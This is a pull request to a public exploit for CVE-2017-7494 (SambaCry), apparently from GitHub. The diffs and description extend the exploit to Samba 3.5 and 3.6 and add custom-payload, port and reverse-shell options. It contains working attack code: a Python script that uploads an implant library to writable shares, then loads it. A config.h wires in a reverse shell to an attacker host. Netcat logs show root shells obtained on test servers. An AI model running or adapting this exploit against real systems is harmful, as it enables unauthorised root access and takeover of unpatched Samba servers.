### PR TITLE
Some update

### DIFF
--- a/README.md
+++ b/README.md
@@ -44,7 +44,7 @@ You can now use your own custom .so
 python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
 ```
 
-In case you need to run this script from a x86 machine. In that case, compiling the implant binaries will create two x86 files. Using the flag -n 1 you can disable compilation and copy libimplantx64.so from another machine.
+In case you need to run this script from a x86 machine, compiling the implant binaries will create two x86 files. Using the flag -n 1 you can disable compilation and copy libimplantx64.so from another machine.
 ```
 python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
 ```

--- a/README.md
+++ b/README.md
@@ -31,6 +31,29 @@ If you close too fast the reverse shell, instead of running again the exploit up
 $ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
 ```
 
+
+## UPDATE 11/25/2017 - Archivaldo
+
+You can now run the exploit again samba 3.5.0 and 3.6.0, you just need add the argument -o 1
+```
+python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1 
+```
+
+You can now use your own custom .so
+```
+python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
+```
+
+In case you need to run this script from a x86 machine. In that case, compiling the implant binaries will create two x86 files. Using the flag -n 1 you can disable compilation and copy libimplantx64.so from another machine.
+```
+python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
+```
+
+In case samba runs just on port 139. You can set the samba server port using the argument -p
+```
+python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
+```
+
 ## TODO
 
 I might update it at some point adding support for non Intel based architectures.

--- a/README.md
+++ b/README.md
@@ -49,7 +49,7 @@ In case you need to run this script from a x86 machine, compiling the implant bi
 python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
 ```
 
-In case samba runs just on port 139. You can set the samba server port using the argument -p
+In case samba runs just on port 139. You can set the remote server port using the argument -p
 ```
 python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
 ```

--- a/config.h
+++ b/config.h
@@ -1,3 +1,1 @@
-#define SHELL_PORT 31337
-#define SHELL_HOST "192.168.0.11"
-#define SHELL_BINARY "/bin/sh"
+

--- a/config.h
+++ b/config.h
@@ -1,1 +1,4 @@
-
+#define SHELL_PORT 1337
+#define SHELL_HOST "10.10.10.109"
+#define SHELL_BINARY "/bin/sh"
+#define USE_OLD_ENTRYPOINT 1

--- a/cve_2017_7494.py
+++ b/cve_2017_7494.py
@@ -22,6 +22,7 @@ from impacket.smbconnection import SMBConnection
 CONFIG_H = """#define SHELL_PORT %s
 #define SHELL_HOST "%s"
 #define SHELL_BINARY "%s"
+#define USE_OLD_ENTRYPOINT %s
 """
 
 #-------------------------------------------------------------------------------
@@ -46,6 +47,7 @@ class CSmbExploit:
     self.target = options.target
     self.module = options.module
     self.username = options.username
+    self.sambaOld = options.sambaVersion
     if self.username is None:
       self.username = ""
     self.password = options.password
@@ -58,6 +60,8 @@ class CSmbExploit:
     self.smb = None
 
   def load_module(self, module):
+    module = '\\\PIPE\\' + module  
+    
     log("Trying to load module %s" % module)
     stringbinding = r'ncacn_np:%s[\pipe\%s]' % (self.target, module)
     sb = transport.DCERPCStringBinding(stringbinding)
@@ -91,7 +95,7 @@ class CSmbExploit:
       self.hostname = l[0]
 
     with open("config.h", "wb") as f:
-      f.write(CONFIG_H % (self.port, self.hostname, self.shell))
+      f.write(CONFIG_H % (self.port, self.hostname, self.shell, self.sambaOld))
 
     log("Building libraries...")
     ret = os.system("make")
@@ -199,6 +203,8 @@ def main():
   parser.add_option("-x", "--use-x32", dest="is_32", default=False, help=msg)
   msg = "Shell to use (by default /bin/sh)"
   parser.add_option("-s", "--shell", dest="shell", default="/bin/sh", help=msg)
+  msg = "Use old entry point for share library (samba 3.5.0 / 3.6.0))"
+  parser.add_option("-o", "--old-version", dest="sambaVersion", default=0, help=msg)
 
   (options, args) = parser.parse_args()
   if options.target:

--- a/cve_2017_7494.py
+++ b/cve_2017_7494.py
@@ -3,6 +3,8 @@
 """
 Exploit for CVE-2017-7494 by Joxean Koret
 joxeankoret AT yah00 DOT es
+
+Update by archivaldo.
 """
 
 import os

--- a/cve_2017_7494.py
+++ b/cve_2017_7494.py
@@ -50,6 +50,8 @@ class CSmbExploit:
     self.username = options.username
     self.sambaOld = options.sambaVersion
     self.noimplant = options.noimplant
+    self.customBinary = options.customBinary
+    
     if self.username is None:
       self.username = ""
     self.password = options.password
@@ -91,7 +93,7 @@ class CSmbExploit:
 
   def make_library(self):
 	  
-    if int(self.noimplant) == 1:
+    if (int(self.noimplant)) or (len(self.customBinary) > 1) == 1:
       log("I will keep the current binaries. No need for new compilation.")
       return True
     
@@ -149,8 +151,13 @@ class CSmbExploit:
 
     # Randomize the list of shares instead of going from the first to the last
     random.shuffle(l)
-    real_file = self.get_real_library_name()
-    log("Using %s" % real_file)
+    
+    if len(self.customBinary) < 1:
+      real_file = self.get_real_library_name()
+    else:
+      real_file = self.customBinary
+    
+    log("Using  %s" % real_file)
     for share in l:
       log("Trying to copy library '%s' to share '%s'" % (lib_name, share))
       if self.try_put(share, lib_name, real_file):
@@ -171,19 +178,21 @@ class CSmbExploit:
       return False
 
   def exploit(self):
+    
     if not self.make_library():
-      log("Error building library:")
-      return False
-
+        log("Error building library:")
+        return False
+    
     log("Logging into the Samba server %s:%s" % (self.sambaTarget, self.sambaPort))
     if not self.do_login():
       log("Cannot log into the Samba server...")
       return False
 
     lib_name = self.get_random_name()
+    
     if self.module is None:
-      log("Trying to copy random library %s" % lib_name)
       server_directory = self.try_copy_library(lib_name)
+      log("Trying to copy random library %s" % lib_name)
       if server_directory is None:
         log("Unable to copy the payload to the target :(")
         return False
@@ -227,6 +236,9 @@ def main():
   parser.add_option("--rhost", dest="host", help=msg)
   msg = "Port for reverse shell"
   parser.add_option("--rport", dest="port", default=31337, help=msg)
+  
+  msg = "Use this option if you need to run a custom .so"
+  parser.add_option("--custom", dest="customBinary", default="", help=msg)
   
   (options, args) = parser.parse_args()
   if options.sambaTarget:

--- a/cve_2017_7494.py
+++ b/cve_2017_7494.py
@@ -44,10 +44,12 @@ class CSmbExploit:
   def __init__(self, options):
     self.hostname = options.host
     self.port = options.port
-    self.target = options.target
+    self.sambaTarget = options.sambaTarget
+    self.sambaPort = options.sambaPort
     self.module = options.module
     self.username = options.username
     self.sambaOld = options.sambaVersion
+    self.noimplant = options.noimplant
     if self.username is None:
       self.username = ""
     self.password = options.password
@@ -60,10 +62,11 @@ class CSmbExploit:
     self.smb = None
 
   def load_module(self, module):
-    module = '\\\PIPE\\' + module  
+    if int(self.sambaOld) == 1:
+	  module = '\\\PIPE\\' + module  
     
     log("Trying to load module %s" % module)
-    stringbinding = r'ncacn_np:%s[\pipe\%s]' % (self.target, module)
+    stringbinding = r'ncacn_np:%s[\pipe\%s]' % (self.sambaTarget, module)
     sb = transport.DCERPCStringBinding(stringbinding)
     na = sb.get_network_address()
     rpctransport = transport.SMBTransport(na, filename = module, smb_connection = self.smb)
@@ -87,6 +90,11 @@ class CSmbExploit:
     return "%s.so" % ret
 
   def make_library(self):
+	  
+    if int(self.noimplant) == 1:
+      log("I will keep the current binaries. No need for new compilation.")
+      return True
+    
     if self.hostname is None:
       l = self.get_my_ip()
       if len(l) == 0:
@@ -142,6 +150,7 @@ class CSmbExploit:
     # Randomize the list of shares instead of going from the first to the last
     random.shuffle(l)
     real_file = self.get_real_library_name()
+    log("Using %s" % real_file)
     for share in l:
       log("Trying to copy library '%s' to share '%s'" % (lib_name, share))
       if self.try_put(share, lib_name, real_file):
@@ -152,7 +161,7 @@ class CSmbExploit:
 
   def do_login(self):
     try:
-      self.smb = SMBConnection(remoteName='*SMBSERVER', remoteHost=self.target)
+      self.smb = SMBConnection(remoteName='*SMBSERVER', remoteHost=self.sambaTarget, sess_port=int(self.sambaPort))
       self.smb.login(user=self.username, password=self.password)
       if self.smb.isGuestSession():
         log("Using a GUEST session")
@@ -166,7 +175,7 @@ class CSmbExploit:
       log("Error building library:")
       return False
 
-    log("Logging into the Samba server %s..." % self.target)
+    log("Logging into the Samba server %s:%s" % (self.sambaTarget, self.sambaPort))
     if not self.do_login():
       log("Cannot log into the Samba server...")
       return False
@@ -188,26 +197,39 @@ class CSmbExploit:
 #-------------------------------------------------------------------------------
 def main():
   parser = OptionParser()
-  parser.add_option("-t", "--target", dest="target", help="target ip address")
+  
+  parser.add_option("-t", "--target", dest="sambaTarget", help="target ip address")
+  parser.add_option("-p", "--port", dest="sambaPort", default=445, help="target port")
+  
   msg = "module path on target server (do not use to auto-resolve the module's path)"
   parser.add_option("-m", "--module", dest="module", help=msg)
-  msg = "Hostname for reverse shell"
-  parser.add_option("-H", "--host", dest="host", help=msg)
-  msg = "Port for reverse shell"
-  parser.add_option("-p", "--port", dest="port", default=31337, help=msg)
+  
+  msg = "Use a 32 bit payload (by default, it uses a x86_64 one)"
+  parser.add_option("-x", "--use-x32", dest="is_32", default=False, help=msg)
+  
+  msg = "Shell to use (by default /bin/sh)"
+  parser.add_option("-s", "--shell", dest="shell", default="/bin/sh", help=msg)
+  
+  msg = "Use old entry point for share library (samba 3.5.0 / 3.6.0))"
+  parser.add_option("-o", "--old-version", dest="sambaVersion", default=0, help=msg)
+  
+  msg = "Do not compile libimplant*.so"
+  parser.add_option("-n", "--no-compile", dest="noimplant", default=0, help=msg)
+  
+  #login
   msg = "Username to login into the Samba server"
   parser.add_option("-u", "--username", dest="username", help=msg)
   msg = "Password to login into the Samba server"
   parser.add_option("-P", "--password", dest="password", help=msg)
-  msg = "Use a 32 bit payload (by default, it uses a x86_64 one)"
-  parser.add_option("-x", "--use-x32", dest="is_32", default=False, help=msg)
-  msg = "Shell to use (by default /bin/sh)"
-  parser.add_option("-s", "--shell", dest="shell", default="/bin/sh", help=msg)
-  msg = "Use old entry point for share library (samba 3.5.0 / 3.6.0))"
-  parser.add_option("-o", "--old-version", dest="sambaVersion", default=0, help=msg)
-
+  
+  #reverse shell
+  msg = "Hostname for reverse shell"
+  parser.add_option("--rhost", dest="host", help=msg)
+  msg = "Port for reverse shell"
+  parser.add_option("--rport", dest="port", default=31337, help=msg)
+  
   (options, args) = parser.parse_args()
-  if options.target:
+  if options.sambaTarget:
     exploit = CSmbExploit(options)
     if exploit.exploit():
       log("Success! You should have a reverse shell by now :)")

--- a/impacket/smbconnection.py
+++ b/impacket/smbconnection.py
@@ -482,7 +482,7 @@ class SMBConnection:
         if self.getDialect() == smb.SMB_DIALECT:
             _, flags2 = self._SMBConnection.get_flags()
 
-            pathName = pathName.replace('/', '\\')
+            #pathName = pathName.replace('/', '\\')
             pathName = pathName.encode('utf-16le') if flags2 & smb.SMB.FLAGS2_UNICODE else pathName
 
             ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)

--- a/implant.c
+++ b/implant.c
@@ -102,7 +102,11 @@ static void detach_from_parent(void)
 //------------------------------------------------------------------------------
 // This is the Samba's expected entry point in the module. We could also use
 // just the shared library's constructor, but it's better to play nice to smbd.
+#if USE_OLD_ENTRYPOINT == 1
+int init_samba_module(void)
+#else
 int samba_init_module(void)
+#endif
 {
   printf("Hello from the Samba module!\n");
 


### PR DESCRIPTION
Hello!,
I was trying to test your exploit, but I have found some problems.

the first one was related to impacket and the way the library handle slashes.
You can read more about this in this issue.
[https://github.com/CoreSecurity/impacket/issues/308](url)
Having in mind that you have a local version of impacket, I just # the line generating the problem and everything is working fine.

the second problem was:
[https://marc.info/?l=samba-technical&m=132534986404085](url)
In this commit from 2011 the samba team has changed the entry point from init_samba_module to samba_init_module, so your exploit doesn't work on samba version 3.5.* and 3.6.*.
The fix was also simple.

samba 3.5.10 / lx x86

> root@WorkStation:/# nc -l -p 1337
> whoami; uname -a; /usr/sbin/smbd -V
> root
> Linux localhost 2.6.32-696.16.1.el6.i686 #1 SMP Wed Nov 15 16:16:47 UTC 2017 i686 i686 i386 GNU/Linux
> Version 3.5.10

samba 4.5.9 / lx x64

> root@WorkStation:/opt/bp0/smbmap# nc -l -p 1337
> uname -a; whoami; /sbin/smbd -V
> Linux localhost.localdomain 3.6.11-7.fc16.x86_64 #1 SMP Fri Feb 8 19:33:57 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
> root
> Version 4.5.9

I also made some changes (and add new ones) in arguments to make it more user friendly.

**--no-compile**
this options will disable the compilation of implant.c. The reason for this one was, if you are attacking a samba server from a x86 machine, te compilation script is going to create two x86 binaries overwriting the current binaries. Using this option, you can compile your x64 binary in another machine and use your x86 machine to run the attack.

**--port**
Samba could have port 445 closed and you need to target port 139.

**--old-version**
Use the old entry point for samba .so. If this options is not used, the script will use the new entry point.

**--custom-binary**
Some times you need to use your own custom binary to be loaded on the server.


that's all, have a nice day. :)